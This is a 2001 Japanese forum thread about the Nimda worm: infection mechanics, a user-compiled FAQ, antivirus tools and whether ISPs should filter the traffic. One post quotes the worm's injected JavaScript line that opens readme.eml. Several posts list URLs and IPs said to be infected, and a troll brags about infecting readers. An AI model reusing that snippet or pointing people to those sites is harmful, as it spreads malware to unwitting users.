Nimda !! その産

よしなさいって！！

●前々スレ 「Nimda !!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301

●前スレ 「Nimda その弐!!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617

●関連リンク
マイクロソフト「Nimda ワーム に関する情報」
http://news.2ch.net/test/read.cgi?bbs=news&key=1000945627

Slashdotの記事
「ウイルスに狙われるのはIIS浸透の代償」
http://slashdot.jp/article.pl?sid=01/09/21/1751221&mode=thread&threshold=

>>3
苦しい良いわけですな(藁

●関連スレ
ニュース速報板「スーパー初心者のためのＭＳＮウイルスすれ２」
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667

ニュース速報板「スーパー初心者のためのＭＳＮウイルスすれ３」
http://news.2ch.net/test/read.cgi?bbs=news&key=1000945627

ニュース速報板「スーパー初心者のＭＳＮウイルススレッド【最終板】」
http://news.2ch.net/test/read.cgi?bbs=news&key=1001009235

トレンドマイクロ・Nimda駆除単体ツール
http://www.trendmicro.co.jp/nimda/tool.asp

現在でまわっているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm

IEバージョン確認法
http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm

オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

ウィルス情報
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm

>>3
この記事（ITプロにある元記事のこと）に関してはすごく憤りを感じます。
また、評価内にあるあの擁護記事もね！
なんて無責任な発言なんだろうって思いましたよ

┏━━━┓　　┏━ﾋｮﾝﾃ電子＠感染中━━━┓
┃　IE　 . ┃　　┃　JavaScript＠readme.eml　..┃
┃(´д｀)..┃←..┃┏━━━━━━━━━┓......┃
┃ ﾏﾀｰﾘ..┃　　┃┃wavですが(ﾟДﾟ)何か?┃......┃
┗━━━┛　　┃┃(((((((readme.exe)))))).┃......┃
　　　　　　　　　.┃┗━━━━━━━━━┛......┃
　　　　　　　　　.┗━━━━━━━━━━━━┛

　IE
(´д｀)<読み込んだHTMLのJavaScriptで、読込先がreadme.emlになってるけど...ｵｶｼｲﾖﾅｧ
　IE
(´д｀)<まぁ、emlの関連付けはOEになってるから、OEに渡しとくか...

┏━━━━━━━━━━━━━━━━━━━┓
┃　OE　　←　　readme.eml　　←　　　　IE　　　...┃
┃(´д｀)┏━━━━━━━━━┓　　(´д｀)　　┃
┃ ﾏﾀｰﾘ┃wavですが(ﾟДﾟ)何か?┃　OEさーん . ┃
┃　　　...┃(((((((readme.exe)))))).┃.....ﾒｰﾙﾃﾞｽﾖｰ┃
┃　　　...┗━━━━━━━━━┛　　　　　　　...┃
┗━━━━━━━━━━━━━━━━━━━┛

┏━━━━━━━━━━━━━━━━┓
┃　OE　 . 　.┏━━━━━━━━━┓　┃
┃(´д｀) 　 ..┃wavですが(ﾟДﾟ)何か?┃　┃
┃ｼﾝﾖｳｽﾙﾖ.┃(((((((readme.exe)))))).┃....┃
┃　　　　　　.┗━━━━━━━━━┛　┃
┗━━━━━━━━━━━━━━━━┛

┏━━━━━━━━━━━━━━━━┓
┃　OE　 　　　　　　　　　　　　　　　　...........┃
┃(;ﾟдﾟ)　　本当はEXEﾀﾞﾖﾝ(ﾟ∀ﾟ)ｱｰﾋｬﾋｬ ┃
┃ﾀﾞﾏｻﾚﾀｧ ｱﾋｬﾟ∀ﾟ)readme.exe(ﾟ∀ﾟｱﾋｬ ┃
┃　　　　　　.　　　　　　　　　　　　　　　　　┃
┗━━━━━━━━━━━━━━━━┛

┏━━━━━━━━━━━━━━━━┓
┃Windows　　　　　　　　　　　　　　　　........┃
┃(ﾟ∀ﾟ)　　(ﾟ∀ﾟ)ｱｰﾋｬﾋｬ (ﾟ∀ﾟ)ｱｰﾋｬﾋｬ. .....┃
┃ｱｰﾋｬﾋｬ......ｱﾋｬﾟ∀ﾟ)readme.eml(ﾟ∀ﾟｱﾋｬ┃
┃readme.eml　readme.eml readme.eml....┃　　　　　　　　　　
┗━━━━━━━━━━━━━━━━┛　　　　　　　　　　
　　(ﾟ∀ﾟ)ｱｰﾋｬﾋｬﾋｬ　ｿﾞｳｼｮｸﾀﾞﾖｰﾝ
　　　　　　　　　　┃
━━━┳━ﾏｲｸﾛｿﾌﾄﾈｯﾄﾜｰｸ、ｲﾝﾀｰﾈｯﾄ､ﾛｰｶﾙﾌｧｲﾙｼｽﾃﾑ、ﾒｰﾙ...━━━━╋━━━━
　　　.....┃　　　　　　　　　　　┃　　　　　　　　　　　　　　　　　　　　　　(ﾟ∀ﾟ)ｿｰｼﾝ!ｱｰﾋｬﾋｬ
　　(ﾟ∀ﾟ)ｱｰﾋｬﾋｬ　　　(ﾟ∀ﾟ)ｱｰﾋｬﾋｬﾋｬ　　　　　┏━━━━━━━━━━━━━━━━━━━━━━┓
┏(´д｀)HTML━┓┏(ﾟдﾟ)IIS━━━━━┓ ┃Address:　受信トレイに有るﾒｰﾙのメールアドレス宛て┃
┃　　　　　　　.......┃┃　　　　　　　　　　　　┃ ┃中身:　　　readme.eml　　　　　　　　　　　　　　　　　　　┃
┃　　　　　　　.......┃┃ﾎﾞｸﾉｻｲﾄにｵｲﾃﾞﾖ!!　┃.┃(ﾟ∀ﾟ)ｱﾋｬﾋｬwaveﾀﾞﾖｰﾝﾋｰﾋﾋﾋ　 　　　　　　　　　　　　　.┃
┃　(´д｀)　　　....┃┃　　(・∀・)ｶｴﾚ!!　　　┃.┃(((((((((((((readme.exe)))))))))))　　　　　　　　　　　　　　.┃
┃　ﾏﾀｰﾘ　　　　..┃┃　　　　　　　　　　　　┃ ┗━━━━━━━━━━━━━━━━━━━━━━┛
┗(´д｀)HTML━┛┗(ﾟдﾟ)IIS━━━━━┛
　　　　↓　　　　　　　　　　　↓
┏(ﾟ∀ﾟ)HTML━┓　┏(ﾟ∀ﾟ)IIS━━━━━┓
┃readme.eml　.┃　┃ﾌﾟﾚｾﾞﾝﾄﾀﾞﾖ!!　　　......┃
┃　(ﾟ∀ﾟ)ｱﾋｬ　. ┃　┃readme.eml　　　 ......┃
┃ｱｰﾋｬﾋｬﾋｬ　　┃　┃(ﾟ∀ﾟ)ﾖﾒ!!!!ｱｰﾋｬﾋｬ!!..┃
┗(ﾟ∀ﾟ)HTML━┛　┗(ﾟ∀ﾟ)IIS━━━━━┛

IE.6って使い勝手いいの？5.5と、どう違うの？

>>10

スマソ、前ｽﾚ

http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617&ls=100

の>>505みてくれm(_ _)m

これFAQにまとめる根性いまないです・・。

俺も気になるなぁIE6、でも板違いなので俺と一緒に板移ろう。

>>12

いやそうじゃなくて、

http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617&ls=100

の>>505みてくれm(_ _)m

ﾀﾉﾑ。

12は10に対するフォローね。タイミングミスった。

>>11
今、見てきました。まだ不安定みたいですね！
あ〜こわいなぁ・・・。

>>951
それじゃどうしたらいいんでしょう・・(泣)
いちおう駆除ツールで処理して、その後、確認のために最新のノートンでウィルスチェックしたら大丈夫だったんです。
でも、レジストリエディタを検索したら、例のreadme.emlやら.read.exeやら見つかりました・・
もう、わけわかりません・・
前述の処置をしててもだめなのですか？
レジストリのこいつら、削除しても意味ないですか？

http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
MSはIE6でもOE6も一緒にインストールすればいいと言っているが

http://memo.st.ryukoku.ac.jp/archive/200109.month/1377.html
Win2kはSP2+IE6+OE6でもやばいらしい……。
鬱。

IEは捨てるのが一番。

>>7
IISは
　SBSの管理ツールとか
　MS ProxyServerとか、
Webサーバーをユーザが意識していなくても
起動を必要とする場合があり、そういうのも含めれば
実行されているIISは数多いと思われ。。。

まあ、本質的には必要のない場面でも、IISの使用を
ユーザに押し付けるMSの発想は納得いかん。。
仮にIISが健全だとしても、、重くなるだけ。。。。

検索がマズく無いなら、DOSで削除は？

ガイシュツかもしれないけどwevの再生をクイックタイムとかの別プラグインにしておくと実は大丈夫かも

ＩＥよりもノートンをＯＳの一部にすればよかったのに。

>>8
の図は間違ってるってば

>>23
そう？8じゃないけど、わりといい線いってるんじゃない？

これからFAQカキコしますm(_ _)m

約８ｽﾚ程度になる見込みです。

【人柱のみなさんに感謝(-人-)する FAQ(700)】

この中に含まれている枝リンク孫リンクのみなさんも含めて(-人-)
「 Nimda !! 」ｽﾚで偉大な実験や衝撃の体験を告白してくださったみなさんに感謝(-人-)
みなさんの人柱精神はたとえささやかなものであってもムダにはいたしません(-人-)

カッコ内は前ｽﾚ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617&ls=100
のｽﾚ番号です。

理由の説明はありません。（理由の説明の誤りによる誤解を防ぐため）
現象のみを記録するよう努めました。

●ニムダはWin95/98系など一般のパソコンでは感染しないのですか？

します。

(894)
9X系も感染するとある
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]

●IE6はニムダに対して安全なのですか？

(403)
IE6は限りなくグレー(´Д`)

貴重な人柱さんの体験
(292)
ファイルをIE上にドラッグしたらメディアプレイヤーが開いて、
”Windows　Media　player　のエラー
オブジェクト名が見つかりませんでした。”
となった

(402)
http://memo.st.ryukoku.ac.jp/archive/200109.month/1302.html
のように勝手にreadme.exeを開く

(850)
レジストリにExolorerBars内のところにLoad.exeとかいわゆるNimda関連のファイル名が書き込まれた
(IE6W2K版)


http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品
：
：
MicrosoftR Internet Explorer 6 (最小構成時のみ)

＃なお、本当に最小構成時のみなのかは疑惑視されています。

●感染して作られた〜.emlをマイコンピュータやエクスプローラーでクリックしただけで 再び感染することはある？（688）

あります。


●フォルダの設定でWeb表示（.JPGを選択と左側に寒ネイルが表示されるような）で感染サイトの.lnkファイル（お気に入りのこと）を選択すると？ （460）

(463)
感染可能ブラウザの場合、選択（開くではない）だけで感染すると思われる。
これ、感染前の.lnkでもリアルタイム更新してると思われる。

(464)
WEB表示にしててネットワーク経由で入れられた *.emlファイルを
確認するため右クリックして選択しただけで感染した例がある。
（IEが未対応だったので）

補足：.htmlなどのファイルでも同様と思われる

●検索をしてreadme.eml readme.exeファイルがなくても、エクスプローラでファイル操作するだけで感染することがありますか？（698）

あります。

(569)
C:\WINNT\Temporary Internet Files\Content.IE5\LHMMLNGA のような所に格納されている
main[1].html
みたいなファイル（キャッシュファイル）にふれてしまうと場合によっては感染する。




●readme.emlファイル・reame.exeファイル・nimda感染ファイル(.htmlなど) を手動で検索、削除。安全？(701)

(701)
場合によってはさわっただけで感染する。
その場合ドラッグや右クリックで削除できない（感染する）


【みなさんの人柱精神はたとえささやかなものであってもムダにはいたしません(-人-)】

以上FAQカキコ終了しましたm(_ _)m

>>24
前スレ見ろ

>>32
よく我慢しました。

>>25
8スレもまだ書いてないぞ(w

ずっと簡単にまとめると
　・IE6はやめておけ
　・エクスプローラ「Web表示」の設定にしない
かな

>>31
サンキュ
また情報が出たら追加してくれる？

>>35

がんばりますm(_ _)m

>>36
そのハンドルはなんと発音すればいいんだ？

ファッキュアー,じゃないの？
俺は>>36じゃないけどさ。

>>37
「チョコボール向井」でええんじゃない？

エフエーキュアー
でどうだ。どっかのワクチンソフトみたいだが。

>>39

ﾜﾗﾀ

>>23
文句を言うぐらいなら直してｸﾚｰ
漏れは疲れた。(´д｀)

連休に入ったせいか情報も少なくなったね。
今感染している国内の鯖は火曜までこのままか。
アクセスも少ないからアポーンするユーザーも減るといいけど。

最小構成ではないＩＥ６でも感染するのか？！

15分に1度程度になった＞Nimda感染マシンからのアタック
どの程度で「沈静化」と見ればいいんだろうなぁ・・・

>>44
よくわかってないので、とりあえずIE6早めておいた方が無難

まとめてみたんですが、アホウなので更新ｷﾎﾞﾝです。

対策(「対」は、事前対策)

対・IE6はやめておけ →IE5.5SP2の人はそのまま、6にしてしまった人はそのままでOK？
　(→どのバージョンにしても、ダイアログは出る。高バーは自動実行は防げる程度。
　→キャンセル等を選択せず、そのままダイアログ・ウインドウを閉じる。)
対・エクスプローラ「Web表示」の設定にしない 。
対・Javaはオフにする。
対・ＷＡＶの関連をメディア・プレーヤーからはずす？(疑問)
対・ノートン先生等の最新パターンファイルを装備。
　・下手な検索・削除はしない。→シングルクリックでも実行されてしまう。
　→DOSからは消して問題なし？
対・OEとの関連を切るか、消してしまえばOK?(疑問)(　しかし、将来的な解決にはならんだろ？)


　・もし感染してたら、フォーマットして、クリーンインスト→IEバーの更新・パッチ当て・JAVA切り・WEB切り(・DLも切り？)→最新パターのアンチウイルスソフト入れる(→Ｗｉｎも？)
　で防御に備えるしかない？

無力ですが、たたき台にしてください。

前スレに続いて良スレage

Windows 2000+IE6は危険。
最小インストールしか出来ないから。OE6は入れられない。

Windows 2000ではこれまでのIEと同様に，標準および完全インストールを実行できず，最小限のインストールになる。
IE6をインストールしたWindows 2000にはService Packを再導入してはならない。
IEがアンインストールできなくなるという。
いずれもWindows 2000が備えるWindowsファイル保護機能のため。
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20010919/3/

あ〜、感染させるのも飽きた

お前ら、もっと感染しろよ

>>48
＞最小インストールしか出来ないから。OE6は入れられない。

これはどっから出たデマなんですかねえ？
私、IE6のW2KインストールでOE6になりましたけど・・・

今、153人感染しました

おっと、154になりました

もっとサイトの数、増やすかな

>>48
そのリンク先って、感染サイトだろ？

>>55

正解。ネスケで見ると窓が出る

>>55
感染してないよ？

>>57
やれやれ、藁にもすがる思いでここに迷い込んでくる雛たちを苛めて楽しいのか？

>>57
最低なヤツ

>>57も最悪だが、>>48も根性捻くれまくった奴だな。

　ええ？どこらへんが感染してるの？

>>61
そうやって誘い込むなって

>>61
キミも感染したのか？悔しかったのは分かるが、やめろよ。

>>57>>61
イッテヨシ

ネタなんだかマジなんだかわからん。
感染してるhtmlを示しておくれ。

感染してるんだから見れねーだろ
知っててそう言うこと言うな

>>65
おれは先生が警告出してくれる。

な〜んだ、Win2kにはIE6は最小でしかインストールできないか。
クソだなM$。

やっぱIEを捨てるのが一番安全だな。

先生の警告って↓で出る？

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

>>68
氏ね

つーか、日経BPって感染サイトででかく出てたじゃねーかよ

>>49-64＆>>71 はWin2kなのにIE6を入れてしまって後悔してる人たちですか？（藁

マイクロソフトがIE6日本語版を提供開始，NT4と2000で異なる注意点
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20010919/3/

>>73
いや、おまえがくだらん感染リンクを貼って、誘い込もうとしてるのに横槍を入れてるだけだよん。

ID:GqEz8zi6

>73　　ID:GqEz8zi6

＞日経BPって感染サイトででかく

感染サイトってなんだ？

なんだこの荒れかたは？
出直してくるか

感染しているhtmlファイル名を言わないからネタだね。

感染時にできる*.emlファイルってどんなんでした？
友達にニムダ対策教えてあげて、SP2とか当てさせたんだけど、
<数字の羅列>.eml　ってファイルが２１個HDん中から見つかったって
これってもうアウト？

>>78
行かないでー　（；；）

>>77
感染したサイトとして　　つー意味じゃねぇの？

>>81
それじゃあ、お前逝ってくれよ

>>77
暗喩と思われ。。

>>80
文字列で検索かけたんじゃねーのか？

>>80
emlはメールファイル。
２０ぐらいあっても普通。

１）readme.exe と　root.exeの検索
２）ファイル中の文字列検索でreadme.eml探す。
３）ディスク中の.htmファイルの最後に>>70が付いてないかチェック。

ttp://itpro.nikkeibp.co.jp/free/NT/NEWS/20010919/3/
は感染してなかったよ

IE6のProgram Files\Internet Explorer\Readme.txtからの抜粋ね
Windows 2000 へのインストール
-----------------------------
現在、Windows 2000で標準インストールおよび完全インストールを実行することはできません。
Internet Explorer 6はシステムに既定のファイル セットをインストールします。
これらは、Internet Explorer 6のWeb ブラウザおよびスクリプティングのサポートが含まれています。

>>85
いや、ちゃんとファイル名検索させたんですよ

>>86
友達がすんごく、いいかげんな奴なんで
メールファイルを自分で保存したかどうかなんて憶えてないんですよ
だからといって自分で開かせるのも怖いし・・・
readme.exeは一緒に検索させましたが、見つからなかったようです。
２）、３）に関してはこれから調べさせます。　感謝！！

過去ログ読まずに８７開いちゃったけど大丈夫？

>>89 平気

忘れてたけど、ここのオンラインスキャン使う手もある。
http://www.trendmicro.co.jp/hcall/scan.htm

>>90
マジ？ほっとしたよ

関係ないけど、Nimdaのべつめいって、CodeRainbowってのもあるんだってね

既出だったらスマソ

寝て起きたらえれーレベル下がったなぁ・・・。(´д｀)

いまさら感染するなよ、と言いたい。

ttp://www.ses-corp.co.jp/products/sst200/main.html
ttp://www.kyowa-kk.co.jp/

>>65

こういうのがないからレベル下がるんだな・・。

ttp://210.12.193.252/
ttp://210.110.148.141/
ttp://210.12.157.160/
ttp://210.221.55.61/
ttp://210.65.38.221/
ttp://www2u.biglobe.ne.jp/~hole/


できれば前ｽﾚ見て自分でフォローしてくれ。
いちいち感染サイトが今も感染しているか確認するのもめんどくさい・・。

アンチDOTE（ANTIDOTE　がいいかも。

>>97

スマソ、前ｽﾚでも見たが分かるように説明してくれ。

>>98

DOTE（ANTIDOTE

をキーワードでgoogleくらいしたんだろうな？

富士通最高。

>>100
F通　なんかあったの？

＞＞ttp://www2u.biglobe.ne.jp/~hole/
いまから・・Ｗｉｎ２０００＋ＩＥ６でにアクセスしてみます
ちなみにＩＩＳはとめてます
Ｗｉｎ２０００→ＳＰ１→ＳＰ２→ＩＥ６とてれました
アンチウイルスソフトは入っていません

>>102

>>96の最後の行はただのQ2じゃないの？
ActiveXをインストールさせようとするけど
これをウィルスっていったら、M$自体がウィルスだな。

その画像ならココ
http://members.tripod.co.jp/bingo852/

だから感染したサイトを張り付けるなって

とりあえず安全が確認できているサイト（チャットとか）では
ＩＥのレベルを中にしてｊａｖａを有効にして

知らないＨＰに行くときや検索かけるときはレベル高で、っていうのではダメかな？

もちろんＳＰ２でということですが.....

ログみたら、CodeRedとNimda 両方飛ばしてきてる所
あるな。
管理者きづけよ。。。

俺的には、>>26-31と>>46は、いい仕事してくれたと思うんだが、修正に排卵かい？

てゆうか情報全然ないじゃん、ここ

>>110
あ、そう。

お前ら、もっと感染しろよ

>>110

情報ならここにあるよ
http://210.12.193.252/

>>103

ただのＱ２でした。
そこで
>>113　の書いた感染サイトにいってみました

メディアプレーが起動しましたが、感染しませんでした

メディアプレー･･･
どんなプレー？

なんだ感染サイトじゃないのか
安心した

Ｗｉｎ２０００＋ＩＥ６って大丈夫なの?

いや、感染する

http://210.12.193.252/
http://210.110.148.141/
http://210.12.157.160/
http://210.221.55.61/
http://210.65.38.221/

ここってなに?

ブラクラかも知れない、
感染源サイトかも知れないし
得体の知れないリンクはとりあえず無視するのが賢明。

そこ、なんか音楽がなるよ

sadmindにやられたサイトだね

接続プロバイダなどが、Codered や Nimdaなどの http GET は
フィルタしてしまうという措置やってくれないかね。。。

やってくれない
プロバイダの関知するところではない。
お前ら一般ユーザーの尻ぬぐいをプロバイダがするわけがない

>>123
なんで人任せにする?

＞＞１０１
今度かう予定

>>123
インターリンクがコードレッドバスターを設置したが、評判が
悪くて５日で撤去してた。
詳しくはプロバイダー板のインターリンクスレ参照。

『コードレッドバスター』設置について 2001.08.15
http://www.interlink.or.jp/notification/backno/2001/info015.html

人任せにする気にする気はないが、
世の中にちゃんと管理されてないマシンで
なおかつ繋がっているものが
これだけ増えてくると、
　(
CodeRedやられたまま未だに放置されてるサーバとか
　　 結構あるしょ
）
そういう対応（上流でのフィルタとか）
も必要じゃないかなという気がする。
自営ドメイン自前サーバが以前よりダイブお手軽になっちゃった
わけだから、そいうった”大衆化”に合わせる必要がでてるんじゃ
ないかなあと。。。

IE6をインストールして、2CHを見るとエラーにまり、再起動を要求されるのですが、いったいこれはいかがなものでしょうか。

>>121はとっくに感染してるんじゃない？

>>98

ANTIDOTE　http://www.vintage-solutions.com/indexie4-jpn.htmlANTIDOTE Personal 2000
2000/12/01 販売開始
ANTIDOTE for PC Viruses Personal 2000 は、好評の簡易型ウイルス検索プログラムを発展させた新しいタイプのウイルス対策ソフトウェアです。

本製品は簡易型同様にインストーラなしにシステム導入するため、システムへの組込みは極めて簡単です。また現在ご使用のウイルス対策製品に競合することなく動作するため、二次的なウイルス対策製品としてもご使用頂けます。

メディアプレーヤー７．１・・インストールしてた・・
やりなおします

>>123-124
ISPの端くれとしての意見。
HTTPでGETしてる内容の監視をすることになってしまいますからね。
ウィルスもらうのも出すのもお客さんの自由であって、それを
ウィルスだからと阻害するのは、ある意味通信内容の検閲に
該当するという意見もありますから。
やってるとこもあるようですが、個人的には疑問です。

やっぱ・・感染しませんでした。
メディアプレーヤーは起動したけど・・終了と詳細しかえらべなかった
いったん・・ＩＥ６さくじょしていれなおしたんじゃたんじゃだめなのかな・・

ユーザのオプションで入りパケットをフィルタする
サービスはあっていいかも知れない。。

でも、、CodeRedにやられたまま、放置してるような人って
こんなサービスあっても使わんだろうな。。。。

>>135
ユーザオプションてことであれば同感。

ユーザの要求と正当な対価、および利益あたりがバランスすれば
ISPにできることってかなりあるんだけどね。

ほとぼりが冷めたころにきっとまた増えるよ＜感染サーバ

YahooBBは当初80番の入りパケットをフィルタリングしてたけど不評で止めた。
透過プロシキ使っても嫌がるユーザーも多いし。
HTTP/GETの内容見てのフィルタじゃ誤動作もある程度考えなければならない。例-インターリンクのコードレッドバスター
80番ポートはインターネットで一番かなめのサービスだから難しいな。
ファイアーウォール設置していても感染するワームをISPのサービスに期待するのは酷でしょう。

感染サイトに入りこんでシャットダウンすればいいじゃん？
なんでやらないの？

法的問題は無いだろ？
留守にしている他人の家で小火（ぼや）があったら、上がりこんで消してもいいだろうに。

>>138
それはCodeRedの時さんざん議論されたが、法的に問題がある。
判例がないから、裁判所がどう判断するかは未知数だが、
緊急避難には当たらない可能性が高い。

よかれと思ってやって捕まっちゃったら損だ。

それは9月21日金曜日のことです。
その夜のテレビのニュースで流れたNimdaの事が気になり、ちょうど良い機会に
思えましたので、ずっとほかしておいたウイルスバスターのウイルス定義をアッ
プデートしようとインターネットに接続したのです。
そう、あれは夜8時40分過ぎのことだったと思います。
Outlook2000を立ち上げてからIE(5.5sp1)を起動。いつものVAIOホームページが
表示されると、ウイルスバスターのコンソールからウイルス定義の更新を行い、
最新データをダウンロードいたしました。
さて、せっかく手に入った最新データ、早速「マイコンピュータのスキャン」を
実行しましたが、その間、並行してメールもダウンロードし、いくつかのサイト
を閲覧しておりましたところ・・・なんとNimda感染のメッセージが！！
ファイルはc:\Admin.dll(2001/09/21 20:49)および、d:\Admin.dllの二つ。
これって、この日感染したって事ですかね？運がいいのやら悪いのやら。

CodeRedとNimdaと両方とばしてくれるサイト管理者に注意を出そうと
思ったら、
そのドメイン、DNS参照でmxレコードがでてこない。

ニムダ感染でバックアップＨＤやその他の周辺機器の売り上げが伸びて
ニムダ特需が起きてると思われ。

>>140
つーかTVでNimdaの事知ってたのに
ネットサーフィン＆メールって･･･？

>>143

要するに意識の差でしょ？普段から、この板来ているような人は
元々意識が高いから、あまり感染しない。

感染しても騒がず、対処も知っているからばら撒かない。

一方、普段から意識の低い人は・・・・（以下、略）。

W2k＋IE6で感染サイト行ったら、ウィンドウが一つ出来たが感染はしなかった
よ〜ん。

このスレの意義は勇敢な人柱にあり。

＞一方、普段から意識の低い人は・・・・（以下、略）。
そういう人達もドメイン自営、自前サーバを簡単にたてる時代
になったことが問題ですね。
大衆化しちゃった以上、個人の意識レベルではなく
社会の仕掛けとして対策が必要とも思うのです。

IIS やメールの話はいっぱいあるけど，共有の何がどういう風に危ないのか情報を見つけられないんだけど，どこにあるの？

http://210.210.21.33/
http://210.220.111.217/
http://210.110.148.141/
http://210.12.157.160/
http://210.12.193.252/
http://210.65.38.221/
http://210.221.55.61/

このアドレス全部が既読になってる漏れは勇者ですか？

http://www.nimda.net/products/index.asp

>>148
全て210.***.***.***だね。

SP2にはずっとしてなかったんですが（今日やっとしました）
アクチブエックスとジャバスクリプトをオフにして
（クッキーだけはオンでした。ヤフオクができなくなるので）
ゾーンアラームをつけていたら、ウィルスを喰らわないで今の所すんでいました。

私の英語力は厨房並なので、ゾーンアラームがYESかNOか聞いてきたときは
ほとんど問答無用でNOにしてたんですが、それがよかったのかなぁ？

２ｃｈのウィルスバスターについての過去ログを読んで
ウィルスバスターも入れ直して、オンライン登録のところを「いいえ」にして
海外のトレンドマイクロのサイトからダウンロードしてくる方式に
変えました。（ウィルスバスター2000までの方式を持っている2001に適用）

あ、プリインストール版のマカフィーウィルススキャンを使ってる方へ。
それは不備だらけです。
私は今回の「ニムダウィルス」騒動がおきる１年前に、
マカフィーのアンチウィルスソフトを更新料払って使い続けようと思っていたのですが
２ｃｈのスレッドに、プリインストール版のマカフィーは
「アイラブユーウィルスに対応してないので、製品版を買ってください」
（更新料払ってもダメ）ということがサイトに書いてあったので、
「ふざけんな！！！」と思ってウィルスバスターを買ったので…。

（ノートンのほうが評判いいみたいなんですが、ウィルスバスターのほうが
　値段が安かったので、こっちを買いました）

>>151
信頼できるニュースソースとして、２ちゃんねるがありますか。
そうですか…。

>teal7.lab.novell.com - - [23/Sep/2001:13:21:29 +0900] "-" 408 -

CodeRedとNimdaに混ざってこんなのが1分ごとに16発連続であったけど…
何これ?
CodeRedの亜種?
Nimdaっぽくはなさげだけど…

これが悪名高きNimdaか・・・

>>152
信頼できるかどうかというと一寸考えるが、情報はすごく早いので
重要な情報源の1つではあるな。
裏を取らないと信用できる情報にならないことだけが難点。

今晩はイギリスからです(藁

にむだアクセスが飛び抜けて激しいところがあって、
調べたらＯＣＮにＩＰを持っていたので、
ＯＣＮに対応をお願いしたのが先週の木曜日。

・・・今日ログを見てみたら、１０００越えてるんですが？
相変わらずどころか、アクセスが激しくなってるんですか？

この期に及んで感染するなよ・・。

ttp://www1.sphere.ne.jp/noone/

いやだいやだ┐（´ー｀）┌

http://www.cameraguild.co.jp/officeheliar/moo/

>>158
だからそこApacheだって。
恐らく便乗犯

ここ、半分くらいアクセス不可・・。

http://space.sphere.ne.jp/rental/

ﾔﾗﾚﾀｰﾖ(´Д`)

---

274 名前： 本日の投稿：01/09/23 11:22
2,3ヶ月前の事。
マカヒのアンインストールについてソースネクストにサポートを依頼したところ、下の回答だった。
・・・ウイルスソフトによって、OSから再インストを余儀なくされた。
ウイルスと同じくらいタチが悪い、と思う。
****************************************************
この度は弊社ソフトをご利用いただき、ありがとうございます。
ご質問の件ですが、ウイルススキャン単体の削除ですが、
Windows2000環境では、レジストリの編集を行うことができない為、
削除することは難しいかと思います。

リカバリは、システムの再構築を意味致しますので、ハードディスクドライブ
のフォーマットから、OSの再インストールを行うことになります。

現状では問題を解決することが難しいこと、また、自作DOS/V機に
関しては、動作対象外となる為、返品についてはお受け致しますので、
ご検討いただけないでしょうか。

ご不明な点がございましたら、お手数ですが、再度ご連絡ください。
今後とも、ソースネクストをよろしくお願いします。

>>162
なんじゃそりゃ!?嫌がらせとしか思えん。
ちなみに元スレどこ？

>>163

http://ton.2ch.net/test/read.cgi?bbs=sec&key=994010282&ls=100

ここです。

ちなみに私は質問はしませんでしたが、この状態になりました。

ウイルスバスターは、マカフィーもウイルスと見なしてアンインストールを要求しますが、この状態になってしまうと、ウイルスバスターはお手上げになってしまいます。

>>160

IISを使っていて感染してApacheに変えたと思われ。

つーか、Apacheだってメール感染とかしてればニムダの場合ウイルスディスペンサーになるでは？

>>160

Windows2000でApacheだったら、redeme.exe実行してもウイルス配布しないの？

http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

対象OSは増えてるんだね。
IE4.0は安全かなと思いこんで放置してなくて良かったよ。

>>165 >>166
ソラリスなんだよなぁ。その前はIISだったのかなぁ。
あと、昨日だったかダイアルアップだと思うけど、CodeRedがきてて
netcraftで調べたらIISじゃなくてBJDだったんだよな。
たまたまIISのときアタックしてその後停止でBJDかなぁ。
M$のいうように、停止中は活動しないのかインストールしてるだけ
でダメなのかよくわからない。

OSじゃのうてIEのVer.だべ。

>>97

http://ton.2ch.net/test/read.cgi?bbs=sec&key=994010282&ls=100
294 名前：名無しさん＠お腹いっぱい。 本日の投稿：01/09/23 22:15
>288
バーテックスリンク社のアンチドートでしょ？
バスターやノートンと同じく市販されてるよ。

使ってるけど、アップデートが結構メンドイ。

http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=http://www1.sphere.ne.jp
ここって、最近変えたのなら残るよねぇ。
元々Apacheとソラリスだと思うのだが違うのか？

>>168

前ｽﾚにLinuxであっても、Web公開してるフォルダをWinと共有してたら、htmlに感染JavaScript埋め込まれて、redeme.eml置いて行かれた、ってな趣旨の書き込みがあったぞ。

>>172

すまん、「Web公開してる」は埋め込まれとは関係ない。

この状態でWeb公開してると、Linuxでもニムダ供給サイトになるのでは、と。

http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301&ls=100
>>451

http://ton.ch.net/test/read.cgi?bbs=sec&key=1000870301&ls=100
>>456

>>171

ユーザーが感染マシンでhtml編集していて、フォルダの中身丸ごとアプしてたらどうよ。

>>168

現実問題として、ある程度の規模のWebサイトを公開している企業などで
は、当然ながらファイア・ウォールを立てて、DMZセグメントのひとつを外
部用として、公開用Webサーバを置き、内部と外部を分けてセキュリティ
確保を行っている。

で、この公開用Webサーバの更新方法はいくつかあるけど、内部用DMZ
セグメントにバックアップ兼用サーバを置いて、ミラーリングする方法や、
専用のファイル共有サーバを置いてコンテンツを置く方法など、いつかの
やり方がある。

いずれにせよ、大規模Webサイトをメンテナンスするには、分業体制でコ
ンテンツを更新しているが、コンテンツの作成・更新作業は、Windowsクラ
イアント・マシンで行われ、動作確認を行った上で、ファイル転送される。

この時に、Webコンテンツのファイル転送を受ける中間サーバがWindows
